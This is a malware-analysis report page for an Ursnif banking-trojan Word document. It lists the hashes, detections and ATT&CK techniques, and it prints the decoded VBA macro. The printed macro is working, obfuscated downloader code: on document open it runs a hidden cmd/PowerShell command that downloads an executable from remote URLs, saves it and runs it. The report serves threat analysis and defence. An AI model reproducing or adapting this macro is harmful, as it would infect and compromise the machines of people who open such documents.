ursnif — Office (OLE) malware analysis

Static analysis result for SHA-256 813a08d3b2216c89…

MALICIOUS

Office (OLE)

68.0 KB Created: 2018-09-11 07:27:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: c9b9de089d2edf53782422c80f8cea34 SHA-1: 21728bce2c980bd91f960d879bd15e9b992d494c SHA-256: 813a08d3b2216c89d42e8225c6de760d785905d1c76bd7428201d68c3c368f65
182 Risk Score

Malware Insights

ursnif · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with a Document_Open subroutine that utilizes a Shell() call. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The ClamAV detection name 'Doc.Downloader.URSNIF-6729855-3' strongly suggests the URSNIF banking trojan family, known for its downloader capabilities.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4913 bytes
SHA-256: e1d3bf73bafec13e7268680b9abda03c4cb35d48870b7f778aaca63108ea6cfe
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "XJBaPariTlApFB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   VarType "aaAbKpOk" + "Sai"
   VarType "6862" + "wEQsAwI" + "8497" + "7666"
   VarType "fZmQfhnV" + "cz" + "bXXZ" + "631"
   VarType "VhL" + "189122051"
Shell FPwimk + FScXPdzAh, Format(vbHide)
   VarType "QIk" + "il"
   VarType "7764" + "UYzLmHQ" + "423638110" + "1483"
   VarType "4361" + "505152485" + "rCsoNbHsALi" + "35"
   VarType "UjtSm" + "hJsIEzYjLdM"
   VarType "QAXVnswW" + "IbL"
End Sub



Attribute VB_Name = "Ppoaziztooprv"
Function FPwimk()

On _
Error _
Resume _
Next
VarType "rDdf" + "z" + "qF" + "Jj"
   VarType "208042452" + "320418813" + "1421" + "Y"
USojhESRic = Format(Chr(0 + 1 + 2 + 5 + 91)) + "md " + "/V/" + Format(Chr(0 + 1 + 1 + 3 + 62)) + Format(Chr(0 + 0 + 0 + 1 + 33)) + "s" + "^e^t ^" + "K1" + "=" + "^ ^    " + "^ ^ ^" + "    "
VarType "145756278" + "7485" + "XpAVK" + "4435"
   VarType "166611269" + "rhVWwRJnr"
   VarType "2330" + "nXD"
   VarType "3359" + "qFoLc"
Tqssc = "   " + " " + "^  }^" + "}^{^h" + Format(Chr(0 + 1 + 2 + 5 + 91)) + "^t^a" + Format(Chr(0 + 1 + 2 + 5 + 91)) + "};ka^e" + "r^b"
VarType "BkQQAmW" + "SEMcUEJhcKwDG"
   VarType "KPVA" + "nFRkMbRVkcYrji" + "Hl" + "GiSC"
   VarType "j" + "697"
oOsKiVzW = ";" + "z^i^" + "A$ m" + "etI-e" + "^k" + "^" + "o" + "v" + "n" + "I;"
VarType "207331631" + "6955"
YjmhqPb = ")" + "^zi" + "^A^$^" + " " + "^,dq" + "^f$" + "(^"
VarType "imbGXS" + "73" + "ZX" + "T"
   VarType "cG" + "TO" + "jlqm" + "7674"
   VarType "Lo" + "2697" + "aiH" + "8114"
   VarType "umj" + "5658"
krszIdntsUo = "e^li^F^" + "dao^lnw" + "^oD." + Format(Chr(0 + 1 + 2 + 5 + 91)) + "^W" + "V^$" + "{^yrt{)" + "t^" + "I^w^$" + "^" + " ni^ d" + "q^f^$(h" + Format(Chr(0 + 1 + 2 + 5 + 91)) + "a^er" + "o^f"
VarType "7073" + "Y"
   VarType "m" + "524295207" + "Sz" + "180447077"
DvWCiTuRV = ";^'e^xe" + ".^'" + "^+Kz" + "^j^$+^'" + "\^'+" + Format(Chr(0 + 1 + 2 + 5 + 91)) + "^i" + "l^bu^"
VarType "115130352" + "oozvJb" + "507663410" + "j"
jIBcBnjZ = "p^:vn^" + "e^$=z^" + "i^A$^;^" + "'^9" + "63^" + "' = ^K" + "z^j^$^" + ";" + ")" + "'^@'(" + "t" + "i^l" + "^pS^.^'"
VarType "86" + "BZo"
   VarType "szpBGT" + "uCzB" + "319105642" + "115984271"
   VarType "lPMZF" + "D" + "6563" + "485587061"
   VarType "872" + "XSjDFks"
KWsLc = "nkt.2" + "a^g" + "r^at^=l" + "?php.t" + "^o^ksn"
VarType "Fnjj" + "1596" + "4482" + "wXikQNRcNiv"
   VarType "161119935" + "GWqfczstpCzTo"
HLFivtYKQ = "a" + "po" + "/TT" + "R/mo" + Format(Chr(0 + 1 + 2 + 5 + 91)) + "^." + "r^j^" + "5om" + "2" + Format(Chr(0 + 1 + 2 + 5 + 91)) + "^s^e"
VarType "161532599" + "75849731" + "kOZkaviORY" + "FpWYJ"
   VarType "ja" + "7133"
   VarType "IViRbDcvc" + "214640097" + "340962204" + "Wi"
   VarType "8229" + "401446853"
   VarType "h" + "7172"
wRhwirP = "fd5^9" + "t" + "//:p^t^" + "t^h'=" + "tI^w"
VarType "cODbnDSi" + "BqtH" + "469663143" + "JD"
   VarType "329795182" + "utHnj" + "472370292" + "FowMHF"
   VarType "fmJf" + "w"
vcjvLjqHS = "$" + ";^tn^e" + "^il" + Format(Chr(0 + 1 + 1 + 3 + 62)) + "be^" + "W^.^" + "t^eN" + " ^t" + Format(Chr(0 + 1 + 2 + 5 + 91)) + "^ej" + "^bo^" + "-^w^"
VarType "rtPlKVoT" + "donY" + "332789427" + "4562"
   VarType "n" + "Izvn" + "owRmkLJH" + "371586533"
   VarType "OHHK" + "382488601" + "8355" + "ZWB"
aPaiGjc = "en=" + Format(Chr(0 + 1 + 2 + 5 + 91)) + "W" + "V" + "$^" + " ^lle" + "h^sr" + "^e^w^o" + "^p&&" + "for /^" + "L %R " + "^in (" + "2^6" + "^5^;-^" + "1"
VarType "Kurh" + "6289"
kBEtovj = ";^0)d" + "^" + "o ^" + "se^t ^Z" + "^Y=" + "!^Z^" + "Y!" + "!^K1:~%" + "R" + ",1!&&i"
FPwimk = USojhESRic + Tqssc + oOsKiVzW + YjmhqPb + krszIdntsUo + DvWCiTuRV + jIBcBnjZ + KWsLc + HLFivtYKQ + wRhwirP + vcjvLjqHS + aPaiGjc + kBEtovj
   VarType "2072" + "Awti" + "Vr" + "6147"
   VarType "9788" + "CC
... (truncated)